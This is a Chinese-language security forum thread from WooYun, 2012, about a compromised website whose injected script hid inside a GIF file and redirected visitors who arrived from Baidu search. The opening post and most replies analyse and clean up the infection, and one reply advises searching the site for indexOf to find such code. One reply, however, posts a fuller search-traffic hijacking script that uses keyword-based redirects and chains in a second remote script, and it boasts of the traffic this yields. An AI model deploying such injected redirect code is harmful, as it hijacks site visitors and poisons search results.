当前位置:WooYun(白帽子技术社区) >> 搜索引擎 >> 昨晚找到的一个利用引擎挂马手法

昨晚找到的一个利用引擎挂马手法

piaoye (123) | 2012-06-12 08:26

一客户站被挂马,正常打开无症状,通过百度关键字打开就跳转到别的站,第一反应就是web扩展或网站加载文件导致,苦逼似的分析了所有web扩展加载网站程序都看了没异常,停了IIS启用阿帕奇服务,引擎关键字打开一样跳转。看来真出在程序里了。

最后发现了以gif图片,被script调用,记事本打开后发现如下代码:
GIF89a="";
var s=document.referrer;
if(s.indexOf("baidu")>0)
{
self.location="http://www.baidu.com/";
//if(parent.window.opener) parent.window.opener.location='http://www.baidu.com/';
}


顿时震精了,清理后网站正常了。感慨现在的挂马方花样越来越多。。

分享到:
  1. 1#
    回复此人 感谢
    一刀终情 ((注意看时间,没乱哦!) ‫(1314520)) | 2012-06-12 08:32

    思路真好~

  2. 2#
    回复此人 感谢
    核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2012-06-12 08:56

    古老的、玩烂了的东西……

  3. 3#
    回复此人 感谢
    shine (shield) | 2012-06-12 09:00

    @核攻击 不要这样,每个人都有头一回!

  4. 4#
    回复此人 感谢
    xsser (十根阳具有长短!!) | 2012-06-12 09:37

    不过这个图片都没有找到怎么调用的啊

  5. 5#
    回复此人 感谢
    piaoye (123) | 2012-06-12 09:40

    @xsser <script src="url.com/1.gif" ></script> 这样调用的

  6. 6#
    回复此人 感谢
    xsser (十根阳具有长短!!) | 2012-06-12 09:50

    @piaoye 嗯,那上面这代码又怎么通过服务器调用呢?

  7. 7#
    回复此人 感谢
    piaoye (123) | 2012-06-12 10:06

    @xsser 因是远程图片,乍一看代码以为是远程服务端做了gif映射导致的,但script是客户端执行,浏览器执行的。。

  8. 8#
    回复此人 感谢
    piaoye (123) | 2012-06-12 10:11

    @xsser 测试了下,应该服务器端做了设置,类似使用了URL重写,访问1.gif时,服务端实际执行的是1.js

  9. 9#
    回复此人 感谢
    piaoye (123) | 2012-06-12 10:23

    也说不通,谁有了解给解答下。

  10. 10#
    回复此人 感谢
    汉时明月 (‮......核审在正长超名签 :) | 2012-06-12 10:44

    <script src="url.com/1.gif" ></script>这个已经很明确了,js文件扩展名是什么都无所谓,没有扩展名也一样;
    第一行      GIF89a=""; 就是标准js赋值

  11. 11#
    回复此人 感谢
    piaoye (123) | 2012-06-12 10:49

    @汉时明月  明白了,感谢  

  12. 12#
    回复此人 感谢
    leehenwu (关注安全) | 2012-06-12 11:13

    明白了,感谢

  13. 13#
    回复此人 感谢
    tenzy (一个傻逼在上我号 不是本人) | 2012-06-12 16:02

    --!

  14. 14#
    回复此人 感谢
    Sunshine (0123456789) | 2012-07-25 18:20

    乖乖,百度快照最好,神马挂马语句都能让你畅通无阻……

  15. 15#
    回复此人 感谢
    _Evil (科普是一种公益行为) | 2012-07-25 18:39

    @piaoye @核攻击 的确,没点智能:

    关键字:-> 淘宝 女装  

    淘 宝女装

    连判断都没有应该效果差得很- -
    GIF89A="";
    应该用图片调用。

    一种简单的js劫持百度SEO的代码,一天做个几十万流量是没问题的。
    这个是简单的代码,所以,隐藏性一般。还有更BT的。哈哈
    代码
    <script language="javascript" type="text/javascript" src="/images/js/j.js" ></script>

    【j.js】
    GIF89a="";
    var d=document.referrer;
    if ((d.indexOf("wd=%BC%E0%CC%FD")>0)||(d.indexOf("wd=%C7%D4%CC%FD")>0)||(d.indexOf("wd=%C6%F7")>0)||(d.indexOf("wd=%CA%D6%BB%FA")>0)||(d.indexOf("wd=%B9%C9%C6%B1")>0)||(d.indexOf("")>0)||(d.indexOf("")>0)||(d.indexOf("")>0)||(d.indexOf("")>0)||(d.indexOf("")>0)||(d.indexOf("")>0)){
    window.location.href="http://xxxxx.blogcn.com";
    }

    document.writeln("<script language=\"javascript\" src=\"http:\/\/xxxx.blogcn.com\/2.gif\"><\/script>\")")

    【2.gif】

    var s=document.referrer;
    if(s.indexOf(".com")>0)
    {
    self.location="http://xxxxx.blogcn.com";
    //if(parent.window.opener) parent.window.opener.location='http://xxxxxxx.blogcn.com';
    }

    function ignoreSpaces(string) {
      return string.replace(/\s+/g,"");
    }一键解决空格问题

    var re=/((wd|q|w|p|query)(=)([%A-Z0-9]*)(*******|*******))/;加正则 更加智能.

  16. 16#
    回复此人 感谢
    虚云 | 2012-10-10 16:03

    直接找indexof是最方便的,全站找indexof,然后再在结果中搜baidu,然后肉眼看,应该很快就能找到。

添加新回复

登录 后才能参与评论.

WooYun(白帽子技术社区)

网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地

登录

其它内容

  • 暂无